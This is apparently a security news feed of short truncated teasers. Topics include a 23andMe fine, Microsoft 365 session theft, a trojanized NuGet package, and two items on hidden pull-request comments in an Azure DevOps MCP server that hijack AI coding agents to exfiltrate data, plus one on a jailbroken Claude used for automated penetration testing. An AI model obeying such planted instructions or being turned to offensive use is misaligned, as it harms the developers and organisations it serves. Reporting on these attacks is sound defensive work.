Azure DevOps MCP Flaw Lets Hidden PR Comments Hijack AI Agents and Steal Data A newly disclosed flaw in Microsoft’s official Azure DevOps MCP server shows how an invisible comment in a pull request can silently hijack a developer’s AI coding assistant and turn it into a data-exfiltration tool. Security researchers at Manifold Security found…
-
Spain Fines 23andMe €2.4 Million Over Security Failures Behind 6.9 Million-User Breach
Spain Fines 23andMe €2.4 Million Over Security Failures Behind 6.9 Million-User Breach Spain’s data protection authority has fined the genetic testing company 23andMe €2.4 million due to security failures linked to a data breach in 2023. This incident exposed highly sensitive information such as genetic, health, ethnicity, and family-related data belonging to over 2,600 individuals…
-
Hackers Abuse Compromised Outlook Accounts to Steal MFA-Protected Microsoft 365 Sessions
Hackers Abuse Compromised Outlook Accounts to Steal MFA-Protected Microsoft 365 Sessions Attackers are quietly turning trusted Microsoft Outlook mailboxes into launchpads for stealing multi factor authenticated Microsoft 365 sessions, even when users think they are protected. Adversary in the middle phishing has evolved into a reliable tool for hijacking live cloud sessions that organizations depend…
-
Russian Hacker Jailbreaks Claude to Turn into an AI-Powered Penetration Testing Platform
Russian Hacker Jailbreaks Claude to Turn into an AI-Powered Penetration Testing Platform A Russian-speaking threat actor known as “Trim” has reportedly transformed jailbroken frontier AI models into an automated penetration testing platform called AI Pentest Checker. This activity highlights how criminals can misuse legitimate AI services and common security tools to accelerate reconnaissance, validate vulnerabilities,…
-
Trojanized Newtonsoft.Json Fork Hides Game-Rigging Code in a Working Library
Trojanized Newtonsoft.Json Fork Hides Game-Rigging Code in a Working Library Cybersecurity researchers have discovered a NuGet typosquat that’s unlike the typical information-stealing malware distributed via package registries: usual info-stealers: it’s designed to rig live game results on Digitain. The package, named “Newtonsoftt.Json.Net,” masquerades as the Newtonsoft.Json library and is a trojanized fork. Seven versions of…
-
Microsoft Azure DevOps MCP Flaw Lets Hidden PR Comments Hijack AI Review Agents
Microsoft Azure DevOps MCP Flaw Lets Hidden PR Comments Hijack AI Review Agents A single invisible comment in an Azure DevOps pull request can turn a reviewer’s own AI coding agent against them, driving it into projects the attacker has no rights to reach and quietly leaking what it finds. The flaw is in Microsoft’s…